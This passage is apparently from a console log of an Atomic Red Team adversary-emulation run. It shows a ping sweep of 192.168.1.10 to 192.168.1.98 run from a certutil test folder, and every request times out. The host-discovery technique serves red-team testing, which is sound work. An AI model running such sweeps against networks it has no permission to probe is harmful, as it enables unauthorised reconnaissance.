3436Ping statistics for 192.168.1.10:
3437 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3438
3439C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.11
3440
3441Pinging 192.168.1.11 with 32 bytes of data:
3442Request timed out.
3443
3444Ping statistics for 192.168.1.11:
3445 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3446
3447C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.12
3448
3449Pinging 192.168.1.12 with 32 bytes of data:
3450Request timed out.
3451
3452Ping statistics for 192.168.1.12:
3453 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3454
3455C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.13
3456
3457Pinging 192.168.1.13 with 32 bytes of data:
3458Request timed out.
3459
3460Ping statistics for 192.168.1.13:
3461 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3462
3463C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.14
3464
3465Pinging 192.168.1.14 with 32 bytes of data:
3466Request timed out.
3467
3468Ping statistics for 192.168.1.14:
3469 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3470
3471C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.15
3472
3473Pinging 192.168.1.15 with 32 bytes of data:
3474Request timed out.
3475
3476Ping statistics for 192.168.1.15:
3477 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3478
3479C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.16
3480
3481Pinging 192.168.1.16 with 32 bytes of data:
3482Request timed out.
3483
3484Ping statistics for 192.168.1.16:
3485 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3486
3487C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.17
3488
3489Pinging 192.168.1.17 with 32 bytes of data:
3490Request timed out.
3491
3492Ping statistics for 192.168.1.17:
3493 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3494
3495C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.18
3496
3497Pinging 192.168.1.18 with 32 bytes of data:
3498Request timed out.
3499
3500Ping statistics for 192.168.1.18:
3501 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3502
3503C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.19
3504
3505Pinging 192.168.1.19 with 32 bytes of data:
3506Request timed out.
3507
3508Ping statistics for 192.168.1.19:
3509 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3510
3511C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.20
3512
3513Pinging 192.168.1.20 with 32 bytes of data:
3514Request timed out.
3515
3516Ping statistics for 192.168.1.20:
3517 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3518
3519C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.21
3520
3521Pinging 192.168.1.21 with 32 bytes of data:
3522Request timed out.
3523
3524Ping statistics for 192.168.1.21:
3525 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3526
3527C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.22
3528
3529Pinging 192.168.1.22 with 32 bytes of data:
3530Request timed out.
3531
3532Ping statistics for 192.168.1.22:
3533 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3534
3535C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.23
3536
3537Pinging 192.168.1.23 with 32 bytes of data:
3538Request timed out.
3539
3540Ping statistics for 192.168.1.23:
3541 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3542
3543C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.24
3544
3545Pinging 192.168.1.24 with 32 bytes of data:
3546Request timed out.
3547
3548Ping statistics for 192.168.1.24:
3549 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3550
3551C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.25
3552
3553Pinging 192.168.1.25 with 32 bytes of data:
3554Request timed out.
3555
3556Ping statistics for 192.168.1.25:
3557 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3558
3559C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.26
3560
3561Pinging 192.168.1.26 with 32 bytes of data:
3562Request timed out.
3563
3564Ping statistics for 192.168.1.26:
3565 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3566
3567C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.27
3568
3569Pinging 192.168.1.27 with 32 bytes of data:
3570Request timed out.
3571
3572Ping statistics for 192.168.1.27:
3573 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3574
3575C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.28
3576
3577Pinging 192.168.1.28 with 32 bytes of data:
3578Request timed out.
3579
3580Ping statistics for 192.168.1.28:
3581 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3582
3583C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.29
3584
3585Pinging 192.168.1.29 with 32 bytes of data:
3586Request timed out.
3587
3588Ping statistics for 192.168.1.29:
3589 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3590
3591C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.30
3592
3593Pinging 192.168.1.30 with 32 bytes of data:
3594Request timed out.
3595
3596Ping statistics for 192.168.1.30:
3597 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3598
3599C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.31
3600
3601Pinging 192.168.1.31 with 32 bytes of data:
3602Request timed out.
3603
3604Ping statistics for 192.168.1.31:
3605 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3606
3607C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.32
3608
3609Pinging 192.168.1.32 with 32 bytes of data:
3610Request timed out.
3611
3612Ping statistics for 192.168.1.32:
3613 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3614
3615C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.33
3616
3617Pinging 192.168.1.33 with 32 bytes of data:
3618Request timed out.
3619
3620Ping statistics for 192.168.1.33:
3621 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3622
3623C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.34
3624
3625Pinging 192.168.1.34 with 32 bytes of data:
3626Request timed out.
3627
3628Ping statistics for 192.168.1.34:
3629 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3630
3631C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.35
3632
3633Pinging 192.168.1.35 with 32 bytes of data:
3634Request timed out.
3635
3636Ping statistics for 192.168.1.35:
3637 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3638
3639C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.36
3640
3641Pinging 192.168.1.36 with 32 bytes of data:
3642Request timed out.
3643
3644Ping statistics for 192.168.1.36:
3645 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3646
3647C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.37
3648
3649Pinging 192.168.1.37 with 32 bytes of data:
3650Request timed out.
3651
3652Ping statistics for 192.168.1.37:
3653 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3654
3655C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.38
3656
3657Pinging 192.168.1.38 with 32 bytes of data:
3658Request timed out.
3659
3660Ping statistics for 192.168.1.38:
3661 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3662
3663C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.39
3664
3665Pinging 192.168.1.39 with 32 bytes of data:
3666Request timed out.
3667
3668Ping statistics for 192.168.1.39:
3669 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3670
3671C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.40
3672
3673Pinging 192.168.1.40 with 32 bytes of data:
3674Request timed out.
3675
3676Ping statistics for 192.168.1.40:
3677 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3678
3679C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.41
3680
3681Pinging 192.168.1.41 with 32 bytes of data:
3682Request timed out.
3683
3684Ping statistics for 192.168.1.41:
3685 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3686
3687C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.42
3688
3689Pinging 192.168.1.42 with 32 bytes of data:
3690Request timed out.
3691
3692Ping statistics for 192.168.1.42:
3693 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3694
3695C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.43
3696
3697Pinging 192.168.1.43 with 32 bytes of data:
3698Request timed out.
3699
3700Ping statistics for 192.168.1.43:
3701 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3702
3703C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.44
3704
3705Pinging 192.168.1.44 with 32 bytes of data:
3706Request timed out.
3707
3708Ping statistics for 192.168.1.44:
3709 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3710
3711C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.45
3712
3713Pinging 192.168.1.45 with 32 bytes of data:
3714Request timed out.
3715
3716Ping statistics for 192.168.1.45:
3717 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3718
3719C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.46
3720
3721Pinging 192.168.1.46 with 32 bytes of data:
3722Request timed out.
3723
3724Ping statistics for 192.168.1.46:
3725 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3726
3727C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.47
3728
3729Pinging 192.168.1.47 with 32 bytes of data:
3730Request timed out.
3731
3732Ping statistics for 192.168.1.47:
3733 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3734
3735C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.48
3736
3737Pinging 192.168.1.48 with 32 bytes of data:
3738Request timed out.
3739
3740Ping statistics for 192.168.1.48:
3741 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3742
3743C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.49
3744
3745Pinging 192.168.1.49 with 32 bytes of data:
3746Request timed out.
3747
3748Ping statistics for 192.168.1.49:
3749 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3750
3751C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.50
3752
3753Pinging 192.168.1.50 with 32 bytes of data:
3754Request timed out.
3755
3756Ping statistics for 192.168.1.50:
3757 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3758
3759C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.51
3760
3761Pinging 192.168.1.51 with 32 bytes of data:
3762Request timed out.
3763
3764Ping statistics for 192.168.1.51:
3765 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3766
3767C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.52
3768
3769Pinging 192.168.1.52 with 32 bytes of data:
3770Request timed out.
3771
3772Ping statistics for 192.168.1.52:
3773 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3774
3775C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.53
3776
3777Pinging 192.168.1.53 with 32 bytes of data:
3778Request timed out.
3779
3780Ping statistics for 192.168.1.53:
3781 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3782
3783C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.54
3784
3785Pinging 192.168.1.54 with 32 bytes of data:
3786Request timed out.
3787
3788Ping statistics for 192.168.1.54:
3789 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3790
3791C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.55
3792
3793Pinging 192.168.1.55 with 32 bytes of data:
3794Request timed out.
3795
3796Ping statistics for 192.168.1.55:
3797 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3798
3799C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.56
3800
3801Pinging 192.168.1.56 with 32 bytes of data:
3802Request timed out.
3803
3804Ping statistics for 192.168.1.56:
3805 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3806
3807C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.57
3808
3809Pinging 192.168.1.57 with 32 bytes of data:
3810Request timed out.
3811
3812Ping statistics for 192.168.1.57:
3813 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3814
3815C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.58
3816
3817Pinging 192.168.1.58 with 32 bytes of data:
3818Request timed out.
3819
3820Ping statistics for 192.168.1.58:
3821 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3822
3823C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.59
3824
3825Pinging 192.168.1.59 with 32 bytes of data:
3826Request timed out.
3827
3828Ping statistics for 192.168.1.59:
3829 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3830
3831C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.60
3832
3833Pinging 192.168.1.60 with 32 bytes of data:
3834Request timed out.
3835
3836Ping statistics for 192.168.1.60:
3837 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3838
3839C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.61
3840
3841Pinging 192.168.1.61 with 32 bytes of data:
3842Request timed out.
3843
3844Ping statistics for 192.168.1.61:
3845 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3846
3847C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.62
3848
3849Pinging 192.168.1.62 with 32 bytes of data:
3850Request timed out.
3851
3852Ping statistics for 192.168.1.62:
3853 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3854
3855C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.63
3856
3857Pinging 192.168.1.63 with 32 bytes of data:
3858Request timed out.
3859
3860Ping statistics for 192.168.1.63:
3861 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3862
3863C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.64
3864
3865Pinging 192.168.1.64 with 32 bytes of data:
3866Request timed out.
3867
3868Ping statistics for 192.168.1.64:
3869 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3870
3871C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.65
3872
3873Pinging 192.168.1.65 with 32 bytes of data:
3874Request timed out.
3875
3876Ping statistics for 192.168.1.65:
3877 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3878
3879C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.66
3880
3881Pinging 192.168.1.66 with 32 bytes of data:
3882Request timed out.
3883
3884Ping statistics for 192.168.1.66:
3885 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3886
3887C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.67
3888
3889Pinging 192.168.1.67 with 32 bytes of data:
3890Request timed out.
3891
3892Ping statistics for 192.168.1.67:
3893 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3894
3895C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.68
3896
3897Pinging 192.168.1.68 with 32 bytes of data:
3898Request timed out.
3899
3900Ping statistics for 192.168.1.68:
3901 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3902
3903C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.69
3904
3905Pinging 192.168.1.69 with 32 bytes of data:
3906Request timed out.
3907
3908Ping statistics for 192.168.1.69:
3909 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3910
3911C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.70
3912
3913Pinging 192.168.1.70 with 32 bytes of data:
3914Request timed out.
3915
3916Ping statistics for 192.168.1.70:
3917 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3918
3919C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.71
3920
3921Pinging 192.168.1.71 with 32 bytes of data:
3922Request timed out.
3923
3924Ping statistics for 192.168.1.71:
3925 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3926
3927C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.72
3928
3929Pinging 192.168.1.72 with 32 bytes of data:
3930Request timed out.
3931
3932Ping statistics for 192.168.1.72:
3933 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3934
3935C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.73
3936
3937Pinging 192.168.1.73 with 32 bytes of data:
3938Request timed out.
3939
3940Ping statistics for 192.168.1.73:
3941 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3942
3943C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.74
3944
3945Pinging 192.168.1.74 with 32 bytes of data:
3946Request timed out.
3947
3948Ping statistics for 192.168.1.74:
3949 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3950
3951C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.75
3952
3953Pinging 192.168.1.75 with 32 bytes of data:
3954Request timed out.
3955
3956Ping statistics for 192.168.1.75:
3957 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3958
3959C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.76
3960
3961Pinging 192.168.1.76 with 32 bytes of data:
3962Request timed out.
3963
3964Ping statistics for 192.168.1.76:
3965 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3966
3967C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.77
3968
3969Pinging 192.168.1.77 with 32 bytes of data:
3970Request timed out.
3971
3972Ping statistics for 192.168.1.77:
3973 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3974
3975C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.78
3976
3977Pinging 192.168.1.78 with 32 bytes of data:
3978Request timed out.
3979
3980Ping statistics for 192.168.1.78:
3981 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3982
3983C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.79
3984
3985Pinging 192.168.1.79 with 32 bytes of data:
3986Request timed out.
3987
3988Ping statistics for 192.168.1.79:
3989 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3990
3991C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.80
3992
3993Pinging 192.168.1.80 with 32 bytes of data:
3994Request timed out.
3995
3996Ping statistics for 192.168.1.80:
3997 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
3998
3999C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.81
4000
4001Pinging 192.168.1.81 with 32 bytes of data:
4002Request timed out.
4003
4004Ping statistics for 192.168.1.81:
4005 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4006
4007C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.82
4008
4009Pinging 192.168.1.82 with 32 bytes of data:
4010Request timed out.
4011
4012Ping statistics for 192.168.1.82:
4013 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4014
4015C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.83
4016
4017Pinging 192.168.1.83 with 32 bytes of data:
4018Request timed out.
4019
4020Ping statistics for 192.168.1.83:
4021 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4022
4023C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.84
4024
4025Pinging 192.168.1.84 with 32 bytes of data:
4026Request timed out.
4027
4028Ping statistics for 192.168.1.84:
4029 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4030
4031C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.85
4032
4033Pinging 192.168.1.85 with 32 bytes of data:
4034Request timed out.
4035
4036Ping statistics for 192.168.1.85:
4037 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4038
4039C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.86
4040
4041Pinging 192.168.1.86 with 32 bytes of data:
4042Request timed out.
4043
4044Ping statistics for 192.168.1.86:
4045 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4046
4047C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.87
4048
4049Pinging 192.168.1.87 with 32 bytes of data:
4050Request timed out.
4051
4052Ping statistics for 192.168.1.87:
4053 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4054
4055C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.88
4056
4057Pinging 192.168.1.88 with 32 bytes of data:
4058Request timed out.
4059
4060Ping statistics for 192.168.1.88:
4061 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4062
4063C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.89
4064
4065Pinging 192.168.1.89 with 32 bytes of data:
4066Request timed out.
4067
4068Ping statistics for 192.168.1.89:
4069 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4070
4071C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.90
4072
4073Pinging 192.168.1.90 with 32 bytes of data:
4074Request timed out.
4075
4076Ping statistics for 192.168.1.90:
4077 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4078
4079C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.91
4080
4081Pinging 192.168.1.91 with 32 bytes of data:
4082Request timed out.
4083
4084Ping statistics for 192.168.1.91:
4085 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4086
4087C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.92
4088
4089Pinging 192.168.1.92 with 32 bytes of data:
4090Request timed out.
4091
4092Ping statistics for 192.168.1.92:
4093 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4094
4095C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.93
4096
4097Pinging 192.168.1.93 with 32 bytes of data:
4098Request timed out.
4099
4100Ping statistics for 192.168.1.93:
4101 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4102
4103C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.94
4104
4105Pinging 192.168.1.94 with 32 bytes of data:
4106Request timed out.
4107
4108Ping statistics for 192.168.1.94:
4109 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4110
4111C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.95
4112
4113Pinging 192.168.1.95 with 32 bytes of data:
4114Request timed out.
4115
4116Ping statistics for 192.168.1.95:
4117 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4118
4119C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.96
4120
4121Pinging 192.168.1.96 with 32 bytes of data:
4122Request timed out.
4123
4124Ping statistics for 192.168.1.96:
4125 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4126
4127C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.97
4128
4129Pinging 192.168.1.97 with 32 bytes of data:
4130Request timed out.
4131
4132Ping statistics for 192.168.1.97:
4133 Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
4134
4135C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\certutil-2019_09_03_03_46>ping -n 1 -w 100 192.168.1.98
4136
4137Pinging 192.168.1.98 with 32 bytes of data:
4138Request timed out.
4139
4140Ping statistics for 192.168.1.98:
